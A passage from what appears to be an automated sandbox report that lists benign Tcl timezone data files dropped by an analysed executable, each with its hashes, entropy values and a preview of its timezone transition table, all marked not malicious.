Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Johns) {. {-9223372036854775808 -12652 0 LMT}. {-2713897748 -12652 0 NST}. {-1664130548 -9052 1 NDT}. {-1650137348 -12652 0 NST}. {-1640982548 -12652 0 NST}. {-1632076148 -9052 1 NDT}. {-1615145348 -12652 0 NST}. {-1609446548 -12652 0 NST}. {-1598650148 -9052 1 NDT}. {-1590100148 -12652 0 NST}. {-1567286948 -9052 1 NDT}. {-1551565748 -12652 0 NST}. {-1535837348 -9052 1 NDT}. {-1520116148 -12652 0 NST}. {-1503782948 -9052 1 NDT}. {-1488666548 -12652 0 NST}. {-1472333348 -9052 1 NDT}. {-1457216948 -12652 0 NST}. {-1440883748 -9052 1 NDT}. {-1425767348 -12652 0 NST}. {-1409434148 -9052 1 NDT}. {-1394317748 -12652 0 NST}. {-1377984548 -9052 1 NDT}. {-1362263348 -12652 0 NST}. {-1346534948 -9052 1 NDT}. {-1330813748 -12652 0 NST}. {-1314480548 -9052 1 NDT}. {-1299364148 -12652 0 NST}. {-1283030948 -9052 1 NDT}. {-1267914548 -12652 0 NS

C:\Users\user\Desktop\tcl\tzdata\America\St_Kitts Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	150
Entropy (8bit):	4.968800062147563
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEt//kXGm2OHqGnvUd8BIIR/vwvYv:SlSWB9X5290t7m2OHZn7+IR/r
MD5:	5E85BFE130D44D10D8C29A8EA8CB28FD
SHA1:	88135E38E73D41EBD56F0C765820080BA5EE2991
SHA-256:	68E7F44E11B5AB62AD8DE974D2CEFE126C0AD8D8FF81C99D25631C917A3D2D05
SHA-512:	BB4A6AFB3A4F068A06CFA4CD6E29252F75F236022EFB681029D764F9E05F07EBD93D8BA36170E1B0EB45D6BCA0FBD212599539A5DBBD12FFE23302CE7AF1F1AB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Kitts) {. {-9223372036854775808 -15052 0 LMT}. {-1825098548 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\St_Lucia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.9223929202701004
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEtkNcXGm2OHkevX9ipcsdSUTVyUPvwvYv:SlSWB9X5290taTm2OHkeP9ip2UTBPr
MD5:	BA63A04FCE84A064CD2C2742CFC5B42F
SHA1:	8915E56A21E5C285A3BAC9D59C9F5032A1717CF4
SHA-256:	B200A7962B867C23CE468D8D87D91381F015F5F35B5C9FCBF5F7D51CB4630882
SHA-512:	FDCF40C63A9EC0344A56AFE765ED03ED35AF3164E71D9AAB528F8C2DDEFD9D5B6989BABD0B67C6725DBDE59B946FDAB5190ABA15C8D4EB1428D8378D8E423E8E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Lucia) {. {-9223372036854775808 -14640 0 LMT}. {-2524506960 -14640 0 CMT}. {-1830369360 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\St_Thomas Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	151
Entropy (8bit):	5.011357022124918
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEtXIMFw/kXGm2OHvdjx5vUdRZKFI0VvwvYv:SlSWB9X5290tXIMFwTm2OHvhGoFVr
MD5:	1EF8B3A2B1D22A263CE23B5265FEB6E5
SHA1:	C897653D036AD049F3CDCC8D747C94A7A82017C9
SHA-256:	F502C6DAB149C49A5079EB49DE9C543D64CA9D3A49B7CEE05270968FA0531215
SHA-512:	C9127ABBA21DCDF6D5C7A2B2171902BC8EF5CBEDDDF36526D7CE5E218C328CBC01C9402FA437B18A74B8693ADDC851D7F38937A1C10F9BC87A97CFDD00868594
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Thomas) {. {-9223372036854775808 -15584 0 LMT}. {-1846266016 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\St_Vincent Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	183
Entropy (8bit):	4.9525462375838725
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEtPLbREeEXGm2OHeFGevX9oITbFevFadSUVRxzVvwvYv:SlSWB9X5290tzbtm2OHekeP9oInWzUVV
MD5:	AD8BE1BA99D79F1779CA17879E909DC1
SHA1:	EDEACF507F8F4BDE27209C5C8FF03024AA5C805D
SHA-256:	282A54FE6B77CAFD3A6B30378A6D327384DF1ACA88B79309CDEA48B64BF70CC9
SHA-512:	0E2CE9B6391290541E9165660B68A0E0DFF9BB0B99026A37B91FEBCC697F29EF340C0DD5A619D665C9074A2C69504CC41F4985B950E9ED1FB9EB0344C3C8EC5E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/St_Vincent) {. {-9223372036854775808 -14696 0 LMT}. {-2524506904 -14696 0 KMT}. {-1830369304 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Swift_Current Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	845
Entropy (8bit):	4.182525430299964
Encrypted:	false
SSDEEP:	24:cQce7eUFLxsOCX+FmFyyFDVFdPFxFZA8uFZYV:5NecLGO+6yZzXDZA8KZG
MD5:	1502A6DD85B55B9619E42D1E08C09738
SHA1:	70FF58E29CCDB53ABABA7EBD449A9B34AC152AA6
SHA-256:	54E541D1F410AFF34CE898BBB6C7CC945B66DFC9D7C4E986BD9514D14560CC6F
SHA-512:	99F0EFF9F2DA4CDD6AB508BB85002F38B01BDFDE0CBA1EB2F4B5CA8EAD8AAB645A3C26BECF777DE49574111B37F847EFF9320331AC07E84C8E892B688B01D36B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Swift_Current) {. {-9223372036854775808 -25880 0 LMT}. {-2030201320 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-747241200 -21600 0 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}. {-702489600 -25200 0 MST}. {-684342000 -21600 1 MDT}. {-671040000 -25200 0 MST}. {-652892400 -21600 1 MDT}. {-639590400 -25200 0 MST}. {-631126800 -25200 0 MST}. {-400086000 -21600 1 MDT}. {-384364800 -25200 0 MST}. {-337186800 -21600 1 MDT}. {-321465600 -25200 0 MST}. {-305737200 -21600 1 MDT}. {-292435200 -25200 0 MST}. {-273682800 -21600 1 MDT}. {-260985600 -25200 0 MST}. {73472400 -21600 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Tegucigalpa Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	329
Entropy (8bit):	4.580220354026118
Encrypted:	false
SSDEEP:	6:SlSWB9X5290Em2OHskeRbV1UcgdrV/uFn/acD3/uFn/sb9/uFn/yn:MBp5290EmdHsVH1UDB/uFn/z/uFn/k/N
MD5:	004588073FADF67C3167FF007759BCEA
SHA1:	64A6344776A95E357071D4FC65F71673382DAF9D
SHA-256:	55C18EA96D3BA8FD9E8C4F01D4713EC133ACCD2C917EC02FD5E74A4E0089BFBF
SHA-512:	ADC834C393C5A3A7BFD86A933E7C7F594AC970A3BD1E38110467A278DC4266D81C3E96394C102E565F05DE7FBBDA623C673597E19BEC1EA26AB12E4354991066
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tegucigalpa) {. {-9223372036854775808 -20932 0 LMT}. {-1538503868 -21600 0 CST}. {547020000 -18000 1 CDT}. {559717200 -21600 0 CST}. {578469600 -18000 1 CDT}. {591166800 -21600 0 CST}. {1146981600 -18000 1 CDT}. {1154926800 -21600 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Thule Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6666
Entropy (8bit):	3.7481713130223295
Encrypted:	false
SSDEEP:	192:pJunToVmM7IEc2fVGYu2yeB/T/eleWmBk81kS/kV6kef4zjyvUP/ZbJitpJxSIRj:pAWJv
MD5:	8FFE81344C31A51489A254DE97E83C3E
SHA1:	4397D9EDAC304668D95921EF03DFD90F967E772F
SHA-256:	EF6AF4A3FA500618B37AF3CDD40C475E54347D7510274051006312A42C79F20C
SHA-512:	F34A6D44499DE5A4E328A8EAFBA5E77B1B8C04A843160D74978398F1545C821C3034FCBD5ADBFAD8D14D1688907C57E7570023ABD3096D4E4C19E3D3C04428B3
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thule) {. {-9223372036854775808 -16508 0 LMT}. {-1686079492 -14400 0 AST}. {670399200 -10800 1 ADT}. {686120400 -14400 0 AST}. {701848800 -10800 1 ADT}. {717570000 -14400 0 AST}. {733903200 -10800 1 ADT}. {752043600 -14400 0 AST}. {765352800 -10800 1 ADT}. {783493200 -14400 0 AST}. {796802400 -10800 1 ADT}. {814942800 -14400 0 AST}. {828856800 -10800 1 ADT}. {846392400 -14400 0 AST}. {860306400 -10800 1 ADT}. {877842000 -14400 0 AST}. {891756000 -10800 1 ADT}. {909291600 -14400 0 AST}. {923205600 -10800 1 ADT}. {941346000 -14400 0 AST}. {954655200 -10800 1 ADT}. {972795600 -14400 0 AST}. {986104800 -10800 1 ADT}. {1004245200 -14400 0 AST}. {1018159200 -10800 1 ADT}. {1035694800 -14400 0 AST}. {1049608800 -10800 1 ADT}. {1067144400 -14400 0 AST}. {1081058400 -10800 1 ADT}. {1099198800 -14400 0 AST}. {1112508000 -10800 1 ADT}. {1

C:\Users\user\Desktop\tcl\tzdata\America\Thunder_Bay Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8058
Entropy (8bit):	3.7473289441354263
Encrypted:	false
SSDEEP:	96:hePraC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:hirrn+qvOTFhPI1jFIL
MD5:	CE6E17F16AA8BAD3D9DB8BD2E61A6406
SHA1:	7DF466E7BB5EDD8E1CDF0ADC8740248EF31ECB15
SHA-256:	E29F83A875E2E59EC99A836EC9203D5ABC2355D6BD4683A5AEAF31074928D572
SHA-512:	833300D17B7767DE74E6F2757513058FF5B25A9E7A04AB97BBBFFAC5D9ADCC43366A5737308894266A056382D2589D0778EEDD85D56B0F336C84054AB05F1079
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Thunder_Bay) {. {-9223372036854775808 -21420 0 LMT}. {-2366733780 -21600 0 CST}. {-1893434400 -18000 0 EST}. {-883594800 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {18000 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {126248400 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600

C:\Users\user\Desktop\tcl\tzdata\America\Tijuana Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8470
Entropy (8bit):	3.7667993951223955
Encrypted:	false
SSDEEP:	96:mb4I5mC2ZCAFBWsBNwj/lpmlOxGcKcnRH31t+ucgge:y5DaYaNwj/lpmlOxnKcndIG
MD5:	F993E030963356E9BABBAB56F68C8B2F
SHA1:	779A79ACFCA2BA0E81A00E65D9CE0E6A2C0C5C18
SHA-256:	937C3B2FE7DA094E755AFB8CE9E97CF512E50C4F2086740BB57A77F0EA2BEC3E
SHA-512:	11F2F0FF2629EF30F61C8681BB28415F594A0CFD1930770B4F71C1E69AA615B25BDE5D9CCB167183F66C52BB921408847D6FEF9A4EB3951C8E1BC3577E33CB0B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tijuana) {. {-9223372036854775808 -28084 0 LMT}. {-1514736000 -25200 0 MST}. {-1451667600 -28800 0 PST}. {-1343062800 -25200 0 MST}. {-1234803600 -28800 0 PST}. {-1222963200 -25200 1 PDT}. {-1207242000 -28800 0 PST}. {-873820800 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-761677200 -28800 0 PST}. {-686073600 -25200 1 PDT}. {-661539600 -28800 0 PST}. {-504892800 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {-337183200 -25200 1 PDT}. {-323881200 -28800 0 PST}. {-305733600 -25200 1 PDT}. {-292431600 -28800 0 PST}. {-283968000 -28800 0 PST}. {189331200 -28800 0 PST}. {199274400 -25200 1 PDT}. {21560

C:\Users\user\Desktop\tcl\tzdata\America\Toronto Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10883
Entropy (8bit):	3.7202964099536917
Encrypted:	false
SSDEEP:	96:9wUYG1dbgZ8UMrEUWraC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:9wS1dbgZ8UMrVWrrn+qvOTFhPI1jFIL
MD5:	9C60AFDFA3BA2002BA68673B778194CF
SHA1:	D6D17C82AEC4B85BA7B0F6FCB36A7582CA26A82B
SHA-256:	7744DB6EFE39D636F1C88F8325ED3EB6BF8FA615F52A60333A58BCE579983E87
SHA-512:	3C793BB00725CF37474683EAB70A0F2B2ACAE1656402CDD7E75182988DC20361A8651A624A5220983E3E05333B9817DCBEAF20D34BD55C5128F55474A02A9455
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Toronto) {. {-9223372036854775808 -19052 0 LMT}. {-2366736148 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1609441200 -18000 0 EST}. {-1601753400 -14400 1 EDT}. {-1583697600 -18000 0 EST}. {-1567357200 -14400 1 EDT}. {-1554667200 -18000 0 EST}. {-1534698000 -14400 1 EDT}. {-1524074400 -18000 0 EST}. {-1503248400 -14400 1 EDT}. {-1492365600 -18000 0 EST}. {-1471798800 -14400 1 EDT}. {-1460916000 -18000 0 EST}. {-1440954000 -14400 1 EDT}. {-1428861600 -18000 0 EST}. {-1409504400 -14400 1 EDT}. {-1397412000 -18000 0 EST}. {-1378054800 -14400 1 EDT}. {-1365962400 -18000 0 EST}. {-1346605200 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-1220806800

C:\Users\user\Desktop\tcl\tzdata\America\Tortola Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	149
Entropy (8bit):	4.944516071480454
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEqMRKCSXGm2OHvV14YvUdRZmxR/vwvYv:SlSWB9X5290RRKCJm2OHvf4YG0X/r
MD5:	CB5F2F9B4B7C8B4DAD8682F1D6563D57
SHA1:	408B11831F1BFF7F435C6CF1085804A18C37A4AF
SHA-256:	BC5E3F9D78430FD1439577ED8384BAB4963A810C6C3AE19B45D69FF985144C1C
SHA-512:	13D989CDAC84083397711DA40B41369B5FA20A2F84114F9773B6AB8C0C962E31B9E7E3CFECD131B2B05D562329608F1156B0E4CD00D534A89D85E82C58D7D9DB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Tortola) {. {-9223372036854775808 -15508 0 LMT}. {-1846266092 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Vancouver Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9495
Entropy (8bit):	3.7630000632404426
Encrypted:	false
SSDEEP:	192:2f7f/5LB6xi9C7Nf+aNwj/lpmlOxnKcndIG:2f735LB6xi9cfefnK6
MD5:	1ACC41DA124C0CA5E67432760FDC91EC
SHA1:	13F56C3F53076E0027BB8C5814EC81256A37F4AF
SHA-256:	DFC19B5231F6A0AB9E9B971574FB612695A425A3B290699DF2819D46F1250DB0
SHA-512:	2F2E358F5743248DE946B90877EFCCCACAF039956249F17D24B7DA026830A181A125045E2C8937A6ACD674E32887049F2D36A1941F09803DF514ADCDA4055CC5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Vancouver) {. {-9223372036854775808 -29548 0 LMT}. {-2713880852 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-747237600 -25200 1 PDT}. {-732726000 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386

C:\Users\user\Desktop\tcl\tzdata\America\Virgin Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	189
Entropy (8bit):	4.874169230364431
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0tXIMVkvFVAIg20tXIKxL2IAcGEoMXgFHp4IAcGEtZ:SlSWB9IZaM3y7tXIMGvFVAIgptXIKxLu
MD5:	0C73023975170F6B3F335FE37FC571A7
SHA1:	23D91BE78C09FEA980FBEF0062A9F7679E180BCB
SHA-256:	243C36A5745ABAE01DB73E60A505C6A0FBA8A41D9536BB71299B08AB7E130841
SHA-512:	0865BEE8DAE02764D92934CC0F1D1055EAB8115F14CA3A3BC37C52303BA72F1FDE4748E47B1990E6F911B243345A80B8338C69AD511DE2CF36B89E2C8270C716
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/St_Thomas)]} {. LoadTimeZoneFile America/St_Thomas.}.set TZData(:America/Virgin) $TZData(:America/St_Thomas).

C:\Users\user\Desktop\tcl\tzdata\America\Whitehorse Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7613
Entropy (8bit):	3.789738507183991
Encrypted:	false
SSDEEP:	96:hmD+C2ZCHtffWsBNwj/lpmlOxGcKcnRH31t+ucgge:hm3Nf+aNwj/lpmlOxnKcndIG
MD5:	CBCFD98E08FCCEB580F66AFE8E670AF5
SHA1:	7E922CCD99CD7758709205E4C9210A2F09F09800
SHA-256:	72992080AA9911184746633C7D6E47570255EE85CC6FE5E843F62331025B2A61
SHA-512:	18290654E5330186B739DEDBC7D6860FD017D089DAE19E480F868E1FB56A3CF2E685D0099C4CF1D4F2AE5F36D0B72ABE52FBAC29AD4F6AB8A45C4C420D90E2D5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Whitehorse) {. {-9223372036854775808 -32412 0 LMT}. {-2188997988 -32400 0 YST}. {-1632056400 -28800 1 YDT}. {-1615125600 -32400 0 YST}. {-1596978000 -28800 1 YDT}. {-1583164800 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-147884400 -25200 1 YDDT}. {-131554800 -32400 0 YST}. {315561600 -28800 0 PST}. {325677600 -25200 1 PDT}. {341398800 -28800 0 PST}. {357127200 -25200 1 PDT}. {372848400 -28800 0 PST}. {388576800 -25200 1 PDT}. {404902800 -28800 0 PST}. {420026400 -25200 1 PDT}. {436352400 -28800 0 PST}. {452080800 -25200 1 PDT}. {467802000 -28800 0 PST}. {483530400 -25200 1 PDT}. {499251600 -28800 0 PST}. {514980000 -25200 1 PDT}. {530701200 -28800 0 PST}. {544615200 -25200 1 PDT}. {562150800 -28800 0 PST}. {576064800 -25200 1 PDT}. {594205200 -28800 0 PST}. {607514400 -25200 1

C:\Users\user\Desktop\tcl\tzdata\America\Winnipeg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9379
Entropy (8bit):	3.7354364023000937
Encrypted:	false
SSDEEP:	192:t7K22m2eQ7SRWu3O559BxXWDpws1dwVyUAitGeZiSI0PMnp4ozDCM9LfLPix3QWZ:t7K22m2eQ7Swu3O559BxXWDpws1dwVyU
MD5:	F6B8A2DA74DC3429EC1FAF7A38CB0361
SHA1:	1651AD179DB98C9755CDF17FBFC29EF35DE7F588
SHA-256:	FEAA62063316C8F4AD5FABBF5F2A7DD21812B6658FEC40893657E909DE605317
SHA-512:	46C61EFF429075A77C01AF1C02FD6136529237B30B7F06795BCEE26CDB75DDAB2D418283CD95C9A0140D1510E02F393F0A7E9414C99D1B31301AE213BAF50681
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Winnipeg) {. {-9223372036854775808 -23316 0 LMT}. {-2602258284 -21600 0 CST}. {-1694368800 -18000 1 CDT}. {-1681671600 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1029686400 -18000 1 CDT}. {-1018198800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-746035200 -18000 1 CDT}. {-732733200 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620755200 -18000 1 CDT}. {-607626000 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-

C:\Users\user\Desktop\tcl\tzdata\America\Yakutat Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8407
Entropy (8bit):	3.877915398499678
Encrypted:	false
SSDEEP:	96:ZgOZVKyjVYus/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:ZBZVKH/4h5sBPy+CMt/ElALLVuAH
MD5:	8F3203A395A098A1559DBA8211E507BB
SHA1:	24295E907BB779FB6E606730C0EA804D4FD06609
SHA-256:	2B54CD306F1B99938A1D0926020A569D1D1588A340059DEC1DE61FBFD2A1076C
SHA-512:	CE66B5CCEA8AD706854A03C7FBE3E5EC680FED1F716563566E8357083CCFC4E55795609139E999DAF4F5CD4D88269947FDD1D2E10F68E5DE46D02E67FA5A0046
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Yakutat) {. {-9223372036854775808 52865 0 LMT}. {-3225364865 -33535 0 LMT}. {-2188953665 -32400 0 YST}. {-883580400 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-757350000 -32400 0 YST}. {-31503600 -32400 0 YST}. {-21474000 -28800 1 YDT}. {-5752800 -32400 0 YST}. {9975600 -28800 1 YDT}. {25696800 -32400 0 YST}. {41425200 -28800 1 YDT}. {57751200 -32400 0 YST}. {73479600 -28800 1 YDT}. {89200800 -32400 0 YST}. {104929200 -28800 1 YDT}. {120650400 -32400 0 YST}. {126702000 -28800 1 YDT}. {152100000 -32400 0 YST}. {162385200 -28800 1 YDT}. {183549600 -32400 0 YST}. {199278000 -28800 1 YDT}. {215604000 -32400 0 YST}. {230727600 -28800 1 YDT}. {247053600 -32400 0 YST}. {262782000 -28800 1 YDT}. {278503200 -32400 0 YST}. {294231600 -28800 1 YDT}. {309952800 -32400 0 YST}. {325681200

C:\Users\user\Desktop\tcl\tzdata\America\Yellowknife Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7485
Entropy (8bit):	3.785447517514148
Encrypted:	false
SSDEEP:	96:qGzGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:YVUC2mWBNwWTxyWR
MD5:	F7892A95AC025FF42DEAC7DD68E9A1D6
SHA1:	5FDFEB833006620505CE2F0F47C7E0B34319DB3C
SHA-256:	E682009C097E6902595CD860F284E5354DCDD90BE68A19431A40F839B50C42A8
SHA-512:	E186DC91EF45C3DAAA3529C75570D9402EDB529045F1ECB7EA99E74F465E107B63ACABA024CE25DB56387562948BE55DF09FB726D511AB59B81ED646331EF3BE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Yellowknife) {. {-9223372036854775808 0 0 zzz}. {-1104537600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-147891600 -18000 1 MDDT}. {-131562000 -25200 0 MST}. {315558000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {68

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Casey Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	260
Entropy (8bit):	4.635342067673504
Encrypted:	false
SSDEEP:	6:SlSWB9X52L09xvFJm2OHaTQMFuDTKNHATVR:MBp52Lc9mdHaTQMFu3K2TVR
MD5:	6CC1DB82EBBF0D7DF60B01F2AFF9674C
SHA1:	5778B8C36F6D4906B1173FF6BEED90CA0EE65158
SHA-256:	63F6001A9F330A9EF8C28DC9EB003C216BA3799ADE5404EC23FA77049F801208
SHA-512:	6CDC5D309AD237CF2B85E3A9AB47FFE153826C14862B25C8C76256F1D5531E2511A1330E3D1F9FB52EF0674080258EB99D934B82335C9AC3C8B1487868B43E12
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Antarctica/Casey) {. {-9223372036854775808 0 0 zzz}. {-31536000 28800 0 WST}. {1255802400 39600 0 CAST}. {1267714800 28800 0 WST}. {1319738400 39600 0 CAST}. {1329843600 28800 0 WST}.}.

C:\Users\user\Desktop\tcl\tzdata\Antarctica\Davis Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	318
Entropy (8bit):	4.486342929628561
Encrypted:	false
SSDEEP:	6:SlSWB9X52L0DTm2OHaRwz0/ePX7VoX/eyfyRXhNXSeOC/ed:MBp52LeTmdHaKxXODaRRF+
MD5:	BA37E2A48529496C9EBA7E416591C644
SHA1:	AD1C15A0E84C10EBDE9F0404DF969B2EE14CB18E
SHA-256:	B17ABA536140CE822CD14845BD92E85FA1D36CD3AE36F993B99535EA95BACF96
SHA-512:	B96A5324F1D0F25F5518737C8C3B942B9D1A0E626CDC6463F973928AEB0A53EB2C7A65E90C3305E9898220AB582CE3C89943A46605EADC4E4A99309D64B73071
Malicious:	false
